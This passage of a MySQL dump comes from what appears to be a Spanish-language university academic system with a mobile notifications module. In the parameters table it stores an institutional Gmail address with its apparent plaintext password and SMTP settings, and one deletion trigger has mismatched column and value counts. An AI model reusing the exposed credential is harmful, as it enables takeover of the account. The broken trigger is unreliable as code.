75, 160, 'INGRESO', 'A BITÁCORA DEL SISTEMA MÓVIL', '2021-08-22 12:20:03', ''), (232, 75, 160, 'INGRESO', 'A BITÁCORA DEL SISTEMA MÓVIL', '2021-08-22 12:20:29', ''), (233, 75, 160, 'INGRESO', 'A BITÁCORA DEL SISTEMA MÓVIL', '2021-08-22 12:21:10', ''), (234, 75, 160, 'INGRESO', 'A BITÁCORA DEL SISTEMA MÓVIL', '2021-08-22 12:21:19', ''), (235, 75, 179, 'INGRESO', 'A MENU MANTENIMIENTO ', '2021-08-22 12:22:36', ''), (236, 75, 175, 'INGRESO', 'MANTENIMIENTO TIPO NOTIFICACIÓN', '2021-08-22 12:22:39', ''), (237, 75, 179, 'INGRESO', 'A MENU MANTENIMIENTO ', '2021-08-22 12:23:25', ''), (238, 75, 174, 'INGRESO', 'MANTENIMIENTO TIPO MENSAJE', '2021-08-22 12:23:27', ''), (239, 75, 178, 'INGRESO', 'A MENU GESTION', '2021-08-22 12:23:31', ''), (240, 75, 171, 'INGRESO', 'A GESTIÓN DE SEGMENTOS ', '2021-08-22 12:23:33', ''), (241, 75, 173, 'Ingreso', 'A llenar Segmento', '2021-08-22 12:23:39', ''), (242, 75, 171, 'INGRESO', 'A GESTIÓN DE SEGMENTOS ', '2021-08-22 12:24:24', ''), (243, 75, 178, 'INGRESO', 'A MENU GESTION', '2021-08-22 12:24:29', ''), (244, 75, 172, 'INGRESO', 'GESTION DE TRANSACCIONES', '2021-08-22 12:24:30', ''), (245, 75, 172, 'INGRESO', 'GESTION DE TRANSACCIONES', '2021-08-22 13:09:52', ''); -- -- Disparadores `tbl_movil_bitacora` -- DELIMITER $$ CREATE TRIGGER `tgr_movil_bitacora_deleted` BEFORE DELETE ON `tbl_movil_bitacora` FOR EACH ROW INSERT INTO tbl_movil_bitacora_deleted (id,usuario_id,objeto_id,accion,descripcion,fecha,user_delete,fecha_eliminacion) values (OLD.id,OLD.usuario_id,OLD.objeto_id,OLD.accion,OLD.descripcion,OLD.fecha,OLD.token,CURRENT_USER,NOW()) $$ DELIMITER ; -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_movil_bitacora_deleted` -- CREATE TABLE `tbl_movil_bitacora_deleted` ( `id` bigint(20) NOT NULL, `usuario_id` bigint(20) DEFAULT NULL, `objeto_id` bigint(20) DEFAULT NULL, `accion` varchar(45) DEFAULT NULL, `descripcion` varchar(100) DEFAULT NULL, `fecha` datetime DEFAULT NULL, `token` varchar(255) NOT NULL, `user_delete` varchar(100) DEFAULT NULL, `fecha_eliminacion` datetime DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_movil_mensajes_chat` -- CREATE TABLE `tbl_movil_mensajes_chat` ( `id_mensaje` bigint(20) NOT NULL, `id_session_chat` bigint(20) NOT NULL, `id_usuario` bigint(20) NOT NULL, `mensaje` varchar(255) NOT NULL, `flag_lectura` int(1) NOT NULL, `tipo_mensaje` int(11) NOT NULL, `fecha` datetime NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_movil_mensajes_chat` -- INSERT INTO `tbl_movil_mensajes_chat` (`id_mensaje`, `id_session_chat`, `id_usuario`, `mensaje`, `flag_lectura`, `tipo_mensaje`, `fecha`) VALUES (1, 1, 1, 'hola', 0, 1, '2021-08-18 16:12:35'); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_movil_noticias` -- CREATE TABLE `tbl_movil_noticias` ( `id` bigint(20) NOT NULL, `titulo` varchar(90) NOT NULL, `subtitulo` varchar(90) NOT NULL, `descripcion` longtext NOT NULL, `fecha` datetime NOT NULL, `fecha_vencimiento` datetime NOT NULL, `remitente` varchar(45) NOT NULL, `segmento_id` bigint(20) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_movil_noticias` -- INSERT INTO `tbl_movil_noticias` (`id`, `titulo`, `subtitulo`, `descripcion`, `fecha`, `fecha_vencimiento`, `remitente`, `segmento_id`) VALUES (1, 'NUEVA', 'SEGUNDO PARCIAL', 'hola riccy', '2021-08-17 21:32:00', '2021-09-18 23:34:00', 'ADMIN', 1), (2, 'Prubeas', 'Hola', 'hola mund', '2021-08-23 02:44:00', '2021-09-23 01:43:00', 'ADMIN', 1); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_movil_noticia_recurso` -- CREATE TABLE `tbl_movil_noticia_recurso` ( `noticia_id` bigint(20) NOT NULL, `recurso_id` bigint(20) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_movil_noticia_recurso` -- INSERT INTO `tbl_movil_noticia_recurso` (`noticia_id`, `recurso_id`) VALUES (1, 2), (1, 1); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_movil_notificaciones` -- CREATE TABLE `tbl_movil_notificaciones` ( `id` bigint(20) NOT NULL, `titulo` varchar(45) NOT NULL, `descripcion` varchar(255) NOT NULL, `fecha` datetime NOT NULL, `remitente` varchar(45) DEFAULT NULL, `segmento_id` bigint(20) NOT NULL, `tipo_notificacion_id` int(11) NOT NULL, `image_url` varchar(255) NOT NULL, `estado` int(1) NOT NULL DEFAULT 1 ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_movil_notificaciones` -- INSERT INTO `tbl_movil_notificaciones` (`id`, `titulo`, `descripcion`, `fecha`, `remitente`, `segmento_id`, `tipo_notificacion_id`, `image_url`, `estado`) VALUES (1, 'PRUEBA NOTIFICACION', 'NUEVA NOTIFICACION', '2021-08-18 05:24:00', 'ADMIN', 1, 1, 'https://apiappinfomatica.000webhostapp.com/archivos/movil/notificacion/chat v1.0.PNG', 1), (2, 'Pruebas informaticas', 'Pruebas', '2021-08-22 02:40:00', 'ADMIN', 1, 1, '', 0); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_movil_parametros` -- CREATE TABLE `tbl_movil_parametros` ( `id` bigint(20) NOT NULL, `parametro` varchar(200) NOT NULL, `descripcion` varchar(200) DEFAULT NULL, `valor` varchar(45) NOT NULL, `fecha_modificacion` datetime NOT NULL, `creado_por` varchar(90) NOT NULL, `modificado_por` bigint(20) DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_movil_parametros` -- INSERT INTO `tbl_movil_parametros` (`id`, `parametro`, `descripcion`, `valor`, `fecha_modificacion`, `creado_por`, `modificado_por`) VALUES (4, 'NUEVO PARAMETRO', 'CATEGORIA NUEVA', '42', '2021-08-17 21:06:42', 'IROMERO', NULL), (5, 'PRUEBAS', 'CATEGORIANUEVA', '42', '2021-08-17 21:08:43', 'IROMERO', 1); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_movil_segmentos` -- CREATE TABLE `tbl_movil_segmentos` ( `id` bigint(20) NOT NULL, `nombre` varchar(45) NOT NULL, `descripcion` varchar(200) DEFAULT NULL, `creado_por` varchar(45) NOT NULL, `fecha_creacion` datetime NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_movil_segmentos` -- INSERT INTO `tbl_movil_segmentos` (`id`, `nombre`, `descripcion`, `creado_por`, `fecha_creacion`) VALUES (1, 'EXAMEN', 'METODOS', '75', '2021-08-16 20:28:59'); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_movil_segmento_usuario` -- CREATE TABLE `tbl_movil_segmento_usuario` ( `usuario_id` bigint(20) NOT NULL, `segmento_id` bigint(20) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_movil_segmento_usuario` -- INSERT INTO `tbl_movil_segmento_usuario` (`usuario_id`, `segmento_id`) VALUES (59, 1), (55, 1), (53, 1), (74, 1), (75, 1); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_movil_session_chats` -- CREATE TABLE `tbl_movil_session_chats` ( `id_session_chat` bigint(20) NOT NULL, `id_usuario1` bigint(20) NOT NULL, `id_usuario2` bigint(20) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_movil_session_chats` -- INSERT INTO `tbl_movil_session_chats` (`id_session_chat`, `id_usuario1`, `id_usuario2`) VALUES (1, 1, 1), (2, 1, 55), (3, 1, 45); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_movil_tipo_mensajes` -- CREATE TABLE `tbl_movil_tipo_mensajes` ( `id` int(11) NOT NULL, `tipo_mensaje` varchar(45) DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_movil_tipo_mensajes` -- INSERT INTO `tbl_movil_tipo_mensajes` (`id`, `tipo_mensaje`) VALUES (1, 'mensaje normal'), (2, 'mensaje audio'); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_movil_tipo_notificaciones` -- CREATE TABLE `tbl_movil_tipo_notificaciones` ( `id` int(11) NOT NULL, `tipo_notificacion` varchar(255) NOT NULL, `descripcion` varchar(255) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_movil_tipo_notificaciones` -- INSERT INTO `tbl_movil_tipo_notificaciones` (`id`, `tipo_notificacion`, `descripcion`) VALUES (1, 'NOTIFICACION', 'NOTIFICACIONES NORMALES'), (2, 'NOTICIA', 'NOTIFICACIONES SOBRE NOTICIAS'), (3, 'CHAT', 'NOTIFICACIONES DE MENSAJES DEL CHAT'); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_movil_tipo_recursos` -- CREATE TABLE `tbl_movil_tipo_recursos` ( `id` bigint(20) NOT NULL, `descripcion` varchar(90) DEFAULT NULL, `url` varchar(255) DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_movil_tipo_recursos` -- INSERT INTO `tbl_movil_tipo_recursos` (`id`, `descripcion`, `url`) VALUES (1, 'archivo subido desde crear noticia', '../archivos/movil/4.png'), (2, 'archivo subido desde crear noticia', '../archivos/movil/3.png'); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_movil_transacciones` -- CREATE TABLE `tbl_movil_transacciones` ( `id` int(11) NOT NULL, `fecha_envio` datetime DEFAULT NULL, `request_envio` varchar(45) DEFAULT NULL, `response` varchar(45) DEFAULT NULL, `estado` varchar(45) DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_movil_transacciones` -- INSERT INTO `tbl_movil_transacciones` (`id`, `fecha_envio`, `request_envio`, `response`, `estado`) VALUES (1, '2021-08-18 00:13:18', 'envio de notificaciones', 'No se encontraron datos', 'completada'), (2, '2021-08-18 00:16:44', 'envio de notificaciones', 'No se encontraron datos', 'completada'), (3, '2021-08-22 01:41:04', 'envio de notificaciones', 'Error con las variables enviadas a la API RES', 'completada'); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_objetos` -- CREATE TABLE `tbl_objetos` ( `Id_objeto` bigint(20) NOT NULL, `objeto` varchar(255) NOT NULL, `descripcion` varchar(255) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_objetos` -- INSERT INTO `tbl_objetos` (`Id_objeto`, `objeto`, `descripcion`) VALUES (1, 'Creación de preguntas ', 'Creacion de preguntas de seguridad'), (2, 'Gestión de preguntas ', 'Gestionar las preguntas de seguridad'), (3, 'Registro de usuario', 'Registrar los usuarios del sistema'), (4, 'Gestión de usuario', 'Gestionar los usuarios'), (5, 'Creación de roles', 'Crear de roles'), (6, 'Gestión de roles', 'Gestionar los roles'), (7, 'Gestión de parámetros ', 'Gestionar los parámetros '), (8, 'Bitácora ', 'Bitacora del sistema'), (9, 'Creación de permisos a usuarios', 'Dar permisos a los roles de los usuarios'), (10, 'Gestión de permisos a usuarios', 'Gestionar permisos a usuarios'), (11, 'Gestión de respuestas de preguntas de seguridad', 'Gestionar las respuestas de preguntas de seguridad'), (12, 'Cambiar contraseña\r\n', 'Cambiar contraseña dentro del sistema'), (13, 'Inscripción para charla PPS', 'Inscripción de los estudiantes para charla de pps'), (14, 'Gestión de asistencia a charla PPS', 'Gestión de asistencia a charla de PPS'), (15, 'Registro de clases aprobadas', 'Registro de clases aprobadas para constancia'), (16, 'Gestión de clases aprobadas', 'Gestión de clases aprobadas'), (17, 'Registro de datos de empresa', 'Registro de datos de empresa por PPS'), (18, 'Historial de constancias y/o cartas', 'Historial de constancias y/o cartas'), (19, 'Entrega de documentación ', 'Documentación de PPS'), (20, 'Recepción/supervisión de documentos', 'Recepción/supervisión de documentos de PPS'), (21, 'Aprobación/rechazo de PPS', 'Aprobación/rechazo de PPS'), (22, 'Registro de egresados', 'Registro de egresados de IA'), (23, 'Gestión de egresados', 'Gestion de egresados de IA'), (24, 'Registro de proyectos', 'Registro de proyectos vinculación universidad sociedad'), (25, 'Gestión de proyectos', 'Gestion de proyectos vinculación universidad sociedad'), (26, 'Supervisar documentación de PPS', 'Comite de vinculación supervisa documentacion de PPS'), (27, 'Historial de prácticas aprobadas', 'Historial de prácticas aprobadas'), (28, 'Historial de prácticas rechazadas', 'Historial de prácticas rechazadas'), (29, 'Solicitud de finalización de práctica', 'Solicitud de finalización de práctica alumno'), (30, 'Cambio de carrera', 'Solicitud cambio de carrera alumno'), (31, 'Carta de egresado', 'Solicitud carta de egresado'), (32, 'Equivalencias', 'Solicitud de equivalencias'), (33, 'Cancelación de clases', 'Solicitud de cancelacion de clases'), (34, 'Revisión de finalización de PPS ', 'Coordinador revision finalizacion practica'), (35, 'Revisión de cambio carrera', 'Coordinador revision cambio carrera'), (36, 'Revisión de carta egresado', 'Coordinador revision carta egresado'), (37, 'Revisión de equivalencias', 'Coordinador revision equivalencias'), (38, 'Revisión de cancelacion de clases', 'Coordinador revision cancelacion de clases'), (39, 'Solicitud de PPS', 'Solicitud de pp1 y pps2'), (40, 'Menú de solicitud de PPS ', 'Menú de solicitud de pps'), (41, 'Creación de asignaturas ', 'Crear asignaturas'), (42, 'Gestión de asignaturas', 'Gestionar asignaturas'), (43, 'Solicitud de examen del himno', 'Solicitud para la realizacion del examnen del himno'), (44, 'Revisión de alumnos himno', 'Revisión de coordinación de los alumnos disponibles para realizar el examen del himno'), (45, 'Menú de carga académica ', 'Creacion de carga académica '), (46, 'Creación de carga académica ', 'Generar carga académica '), (47, 'Gestión de carga académica ', 'Editar carga académica '), (48, 'Historial de carga académica ', 'Control y revision de la carga académica '), (49, 'Menú de docentes', 'Creacion de registro docentes'), (50, 'Registro de docentes', 'Crear nuevos docentes'), (51, 'Gestión de docentes', 'Gestionar docentes'), (52, 'Comisiones y actividades docentes', 'Agregar comisiones y actividades'), (53, 'Reporte carga academica docentes', 'Mostrar reporte carga academica docentes'), (54, 'Perfil docentes', 'Mostrar perfil docentes'), (55, 'Mantenimiento periodo', 'Mantenimiento gestion periodo'), (56, 'Mantenimiento jornadas docente', 'Mantenimiento gestion jornadas'), (57, 'Mantenimiento comisiones docente', 'Mantenimiento gestion comisiones'), (58, 'Mantenimiento edificio', 'Mantenimiento gestion edificios'), (59, 'Mantenimiento categorías ', 'Mantenimiento gestion categorias'), (60, 'Mantenimiento aulas', 'Mantenimiento gestion aulas'), (61, 'Mantenimiento grados académicos ', 'Mantenimiento gestion grados academicos'), (62, 'Mantenimiento estado civil', 'Mantenimiento gestion estados civil'), (63, 'Mantenimiento crear periodo', 'Mantenimiento crear nuevo periodo'), (64, 'Mantenimiento crear comisiones', 'Mantenimiento crear comisiones'), (65, 'Mantenimiento crear grados', 'Mantenimiento crear grados academicos'), (66, 'Mantenimiento crear categorías ', 'Mantenimiento crear categorias docentes'), (67, 'Mantenimiento crear jornadas', 'Mantenimiento crear jornadas'), (68, 'Mantenimiento crear estado civil', 'Mantenimiento crear estado civil'), (69, 'Menú supervisión vista', 'Menú para gestionar las supervisiones'), (70, 'Menú mantenimientos', 'Menú para todos los mantenimientos existentes'), (71, 'Menú ayuda', 'Menú los manuales de usuario'), (72, 'Menú vinculación ', 'Menú de vinculacion'), (73, 'Mantenimiento crear genero', 'Mantenimiento crear genero'), (74, 'Mantenimiento actividades', 'Mantenimiento gestion actividades'), (75, 'Mantenimiento crear actividades', 'Mantenimiento crear actividades'), (76, 'Mantenimiento crear departamento', 'Mantenimiento crear departamento'), (77, 'Mantenimiento departamento', 'Mantenimiento gestion departamento'), (78, 'Mantenimiento crear municipio', 'Mantenimiento crear municipio'), (79, 'Mantenimiento municipio', 'Mantenimiento gestion municipio'), (80, 'Mantenimiento atributos', 'Mantenimiento gestion atributos'), (81, 'Mantenimiento crear atributos', 'Mantenimiento crear atributos'), (82, 'Mantenimiento crear aula', 'Mantenimiento crear aulas'), (83, 'Mantenimiento crear edificios', 'Mantenimiento crear edificios'), (84, 'Mantenimiento genero', 'Mantenimiento gestion genero'), (85, 'Mantenimiento horario', 'Mantenimiento gestion horario'), (86, 'Mantenimiento crear horario', 'Mantenimiento crear horario'), (87, 'Menú práctica profesional', 'Menú para solicitar pps'), (88, 'Mantenimiento crear carrera', 'Crear carrera'), (89, 'Mantenimiento carrera', 'Gestionar carrera'), (90, 'Mantenimiento nacionalidad', 'Mantenimiento gestion nacionalidad'), (91, 'Mantenimiento crear nacionalidad', 'Mantenimiento crear nacionalidad'), (92, 'Mantenimiento feriados', 'Mantenimiento de días feriados'), (93, 'Mantenimiento áreas asignaturas', 'Mantenimiento áreas asignaturas'), (94, 'Menu mantenimientos Carga', 'Menu mantenimientos Carga'), (95, 'Menu mantenimiento plan de estudios', 'Menu mantenimientos plan'), (96, 'Crear plan de estudio', 'Crear plan de estudio'), (97, 'Historial plan de estudio', 'Historial plan de estudio'), (98, 'Gestion plan de estudio', 'Gestion plan de estudio'), (99, 'Mantenimiento crear periodo plan', 'Mantenimiento crear periodo plan'), (100, 'Mantenimiento periodo plan', 'Mantenimiento periodo plan'), (101, 'Mantenimiento crear tipo plan', 'Mantenimiento crear tipo plan'), (102, 'Mantenimiento tipo plan', 'Mantenimiento tipo plan'), (103, 'Menu plan de estudio', 'Menu plan de estudio'), (104, 'menu uno', 'menu uno'), (105, 'menu dos', 'menu dos'), (106, 'crear', 'crear'), (107, 'gestion', 'gestion'), (109, 'crear_registro', 'crear_registro'), (110, 'gestion_usuario', 'gestion_usuario'), (111, 'menu implementacion', 'menu imple'), (112, 'prueba1', 'prueba1'), (113, 'prueba2', 'prueba2'), (114, 'menu estudiantes', 'menu estudiantes'), (115, 'crear estudiantes', 'crear estudiantes'), (116, 'gestion estudiantes', 'gestion estudiantes'), (117, 'historial estudiantes', 'historial estudiantes'), (118, 'g_cargajefatura', 'g_cargajefatura'), (119, 'g_reasignacionjefatura', 'g_reasignacionjefatura'), (120, 'g_planificacionjefatura', 'g_planificacionjefatura'), (121, 'jefatura', 'jefatura'), (122, 'crear_notificacion_vista', 'creacion de notificaciones'), (123, 'gestion_notificaciones_vista', 'gestionar notificaciones'), (124, 'crear_noticia_vista', 'creacion de noticias'), (125, 'gestion_noticias_vista', 'gestionar noticias'), (126, 'crear_segmento_vista', 'creacion de nuevos segmentos'), (127, 'gestion_segmentos_vista', 'gestionar segmentos existentes'), (128, 'movil_bitacora_vista', 'bitacora movil'), (160, 'movil_bitacora_vista', ''), (161, 'movil_chat_vista', ''), (162, 'movil_crear_noticia_vista', ''), (163, 'movil_crear_notificacion_vista', ''), (164, 'movil_crear_parametros_vista', ''), (165, 'movil_crear_segmento_vista', ''), (166, 'movil_crear_tipo_mensaje_vista', ''), (167, 'movil_crear_tipo_notificacion_vista', ''), (168, 'movil_gestion_noticia_vista', ''), (169, 'movil_gestion_notificaciones_vista', ''), (170, 'movil_gestion_parametros_vista', ''), (171, 'movil_gestion_segmentos_vista', ''), (172, 'movil_gestion_transacciones_vista', ''), (173, 'movil_llenar_segmento_vista', ''), (174, 'movil_mantenimiento_tipo_mensaje_vista', ''), (175, 'movil_mantenimiento_tipo_notificacion_vista', ''), (176, 'movil_mantenimiento_tipo_recurso_vista', ''), (177, 'movil_mantenimiento_ubicacionrecurso_vista', ''), (178, 'movil_menu_gestion_vista', ''), (179, 'movil_menu_mantenimiento_vista', ''), (180, 'movil_menu_noticias_vista', ''), (181, 'movil_menu_notificaciones_vista', ''); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_parametros` -- CREATE TABLE `tbl_parametros` ( `Id_parametro` bigint(20) NOT NULL, `Id_usuario` bigint(20) NOT NULL, `Parametro` varchar(255) NOT NULL, `Descripcion` varchar(255) NOT NULL, `Valor` varchar(255) NOT NULL, `Modificado_por` varchar(255) NOT NULL, `Fecha_modificacion` datetime NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_parametros` -- INSERT INTO `tbl_parametros` (`Id_parametro`, `Id_usuario`, `Parametro`, `Descripcion`, `Valor`, `Modificado_por`, `Fecha_modificacion`) VALUES (1, 1, 'INTENTOS', 'INTENTOS SESIONES', '3', ' ADMIN', '2021-02-11 17:41:37'), (2, 1, 'Tamano_min_clave', 'TAMANO MINIMO DE LA CLAVE', '8', 'ADMIN', '2020-05-11 00:00:00'), (4, 1, 'Cantidad_preguntas', 'PREGUNTAS INGRESADAS', '3', 'ADMIN', '2020-05-11 00:00:00'), (5, 1, 'Tamano_max_clave', 'TAMANO MAXIMO DE CLAVE', '10', 'ADMIN', '2020-05-11 00:00:00'), (6, 1, 'Tamano_clave_correo', 'TAMANO POR EL CORREO', '8', 'ADMIN', '2020-05-11 00:00:00'), (7, 1, 'CAMBIO_CLAVE', 'TIEMPO PARA CAMBIAR CLAVE', '30', 'ADMIN', '2020-05-11 00:00:00'), (8, 1, 'correo_institucional', 'CORREO DE LA EMPRESA', 'ainformatica2020@gmail.com', ' ADMIN', '2020-05-23 23:53:27'), (9, 1, 'clave_correo', 'CLAVE DEL CORREO', 'Mumu123*', ' ADMIN', '2020-05-23 23:54:16'), (10, 1, 'Puerto', 'PUERTO DEL GMAIL', '465', 'admin', '2020-05-12 00:00:00'), (11, 1, 'HOST_SMTP', 'HOST DEL SERVIDOR', 'smtp.gmail.com', 'admin', '2020-05-11 00:00:00'), (12, 1, 'Admin_correo', 'PERSONA QUE ADMINISTRA EL CORRE', 'Comite de Automatizacion ', ' ADMIN', '2021-05-29 04:48:34'), (13, 1, 'AUTO_REGISTRO', 'AUTO REGISTRO USUARIO', '1', ' ADMIN', '2021-04-14 01:51:29'), (16, 1, 'DOCENTE_VINCULACION_MATUTINA_1', 'DOCENTE ENCARGADO DE CHARLA', 'MSC. SANDRA QUAN ', 'ADMIN', '2020-06-04 17:49:38'), (17, 1, 'DOCENTE_VINCULACION_MATUTINA_2', 'DOCENTE ENCARGADO DE CHARLA', 'MSC. ANGELICA MUÑOZ', ' ADMIN', '2020-08-11 06:08:06'), (18, 1, 'DOCENTE_VINCULACION_VESPERTINA_1', 'DOCENTE ENCARGADO DE CHARLA', 'MSC. CAROLD RITHENHOUSE', 'ADMIN', '2020-06-04 00:00:00'), (20, 1, 'DOCENTE_VINCULACION_VESPERTINA_2', 'DOCENTE ENCARGADO DE CHARLA', 'LIC. JULIAN ', 'ADMIN', '2020-06-04 00:00:00'), (21, 1, 'DIAS_CHARLA', 'VALIDACION EN DIAS , PARA FECHA VALIDAS PARA CHARLA ', '90', 'ADMIN', '2020-06-04 00:00:00'), (22, 1, 'CANTIDAD_DOCUMENTOS', 'MÁXIMA CANTIDAD DE DOCUMENTOS DEL PRACTICANTE.', '9', 'ADMIN', '2020-06-04 00:00:00'), (23, 1, 'mayoria_edad', 'validacion para mayoria edad', '18', 'ADMIN', '2021-03-16 18:35:16'), (24, 1, 'num_periodo_maximo', 'el maximo de periodos en un año', '3', 'ADMIN', '2021-04-08 10:14:07'); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_permisos_usuarios` -- CREATE TABLE `tbl_permisos_usuarios` ( `Id_permisos_usuario` bigint(20) NOT NULL, `Id_rol` bigint(20) NOT NULL, `Id_objeto` bigint(20) NOT NULL, `insertar` varchar(255) NOT NULL, `modificar` varchar(255) NOT NULL, `eliminar` varchar(255) NOT NULL, `visualizar` varchar(255) NOT NULL, `Fecha_creacion` datetime DEFAULT NULL, `Creado_por` varchar(255) DEFAULT NULL, `Modificado_por` varchar(255) DEFAULT NULL, `Fecha_modificacion` datetime DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_permisos_usuarios` -- INSERT INTO `tbl_permisos_usuarios` (`Id_permisos_usuario`, `Id_rol`, `Id_objeto`, `insertar`, `modificar`, `eliminar`, `visualizar`, `Fecha_creacion`, `Creado_por`, `Modificado_por`, `Fecha_modificacion`) VALUES (1, 46, 1, '1', '1', '1', '1', NULL, NULL, 'ADMIN', '2021-05-12 05:59:16'), (2, 46, 2, '1', '1', '1', '1', NULL, NULL, 'admin', '2020-05-22 20:45:26'), (4, 46, 8, '1', '1', '1', '1', NULL, NULL, NULL, NULL), (5, 46, 3, '1', '1', '1', '1', NULL, NULL, NULL, NULL), (6, 46, 4, '1', '1', '1', '1', NULL, NULL, NULL, NULL), (7, 46, 5, '1', '1', '1', '1', NULL, NULL, NULL, NULL), (8, 46, 6, '1', '1', '1', '1', NULL, NULL, NULL, NULL), (9, 46, 7, '1', '1', '1', '1', NULL, NULL, NULL, NULL), (10, 46, 9, '1', '1', '1', '1', NULL, NULL, NULL, NULL), (11, 46, 10, '1', '1', '1', '1', NULL, NULL, NULL, NULL), (12, 46, 11, '1', '1', '1', '1', NULL, NULL, NULL, NULL), (14, 46, 12, '1', '1', '1', '1', '2020-05-22 22:32:56', ' admin ', NULL, NULL), (40, 46, 13, '1', '1', '1', '1', '2020-05-28 22:57:35', ' ADMIN ', NULL, NULL), (41, 46, 14, '1', '1', '1', '1', '2020-05-28 22:57:37', ' ADMIN ', NULL, NULL), (42, 46, 15, '1', '1', '1', '1', '2020-05-28 22:57:39', ' ADMIN ', NULL, NULL), (43, 46, 16, '1', '1', '1', '1', '2020-05-28 22:57:41', ' ADMIN ', NULL, NULL), (44, 46, 17, '1', '1', '1', '1', '2020-05-28 22:57:44', ' ADMIN ', NULL, NULL), (45, 46, 18, '1', '1', '1', '1', '2020-05-28 22:57:46', ' ADMIN ', NULL, NULL), (46, 46, 19, '1', '1', '1', '1', '2020-05-28 22:57:48', ' ADMIN ', NULL, NULL), (47, 46, 20, '1', '1', '1', '1', '2020-05-28 22:57:50', ' ADMIN ', NULL, NULL), (48, 46, 21, '1', '1', '1', '1', '2020-05-28 22:57:52', ' ADMIN ', NULL, NULL), (49, 46, 22, '1', '1', '1', '1', '2020-05-28 22:57:54', ' ADMIN ', NULL, NULL), (50, 46, 23, '1', '1', '1', '1', '2020-05-28 22:57:57', ' ADMIN ', NULL, NULL), (51, 46, 24, '1', '1', '1', '1', NULL, NULL, NULL, NULL), (52, 46, 25, '1', '1', '1', '1', NULL, NULL, NULL, NULL), (53, 46, 26, '1', '1', '1', '1', NULL, NULL, NULL, NULL), (54, 49, 13, '1', '0', '0', '1', '2020-06-24 23:41:47', ' ADMIN ', NULL, NULL), (55, 49, 17, '1', '1', '0', '1', '2020-06-24 23:41:51', ' ADMIN ', 'ADMIN', '2021-03-05 23:59:28'), (56, 49, 19, '1', '0', '0', '1', '2020-06-24 23:41:54', ' ADMIN ', NULL, NULL), (57, 46, 27, '1', '1', '1', '1', '2020-06-24 23:44:09', ' ADMIN ', NULL, NULL), (58, 46, 28, '1', '1', '1', '1', '2020-06-24 23:44:12', ' ADMIN ', NULL, NULL), (59, 46, 29, '1', '1', '1', '1', '2020-07-30 19:32:01', ' ADMIN ', 'ADMIN', '2021-04-14 01:38:03'), (60, 46, 30, '1', '1', '0', '1', '2020-07-30 19:32:04', ' ADMIN ', NULL, NULL), (61, 46, 31, '1', '1', '0', '1', '2020-07-30 19:32:07', ' ADMIN ', NULL, NULL), (62, 46, 32, '1', '1', '0', '1', '2020-07-30 19:32:11', ' ADMIN ', NULL, NULL), (63, 46, 33, '1', '1', '0', '1', '2020-07-30 19:32:14', ' ADMIN ', NULL, NULL), (64, 46, 34, '1', '1', '0', '1', '2020-07-30 19:32:17', ' ADMIN ', NULL, NULL), (65, 46, 35, '1', '1', '0', '1', '2020-07-30 19:32:20', ' ADMIN ', NULL, NULL), (66, 46, 36, '1', '1', '0', '1', '2020-07-30 19:32:23', ' ADMIN ', NULL, NULL), (67, 46, 37, '1', '1', '1', '1', '2020-07-30 19:32:26', ' ADMIN ', 'ADMIN', '2021-04-14 01:43:21'), (68, 46, 38, '1', '1', '1', '1', '2020-07-30 19:32:29', ' ADMIN ', 'ADMIN', '2021-04-14 01:42:40'), (69, 49, 29, '1', '1', '1', '1', '2020-08-03 10:04:32', ' ADMIN ', NULL, NULL), (70, 49, 30, '1', '1', '1', '1', '2020-08-03 10:04:32', ' ADMIN ', NULL, NULL), (71, 49, 31, '1', '1', '1', '1', '2020-08-03 10:04:32', ' ADMIN ', NULL, NULL), (72, 49, 32, '1', '1', '1', '1', '2020-08-03 10:04:32', ' ADMIN ', NULL, NULL), (73, 49, 33, '1', '1', '1', '1', '2020-08-03 10:04:32', ' ADMIN ', NULL, NULL), (74, 51, 13, '0', '0', '0', '1', '2020-08-05 16:46:08', ' ADMIN ', NULL, NULL), (75, 53, 29, '1', '0', '0', '1', '2020-08-11 06:07:25', ' ADMIN ', 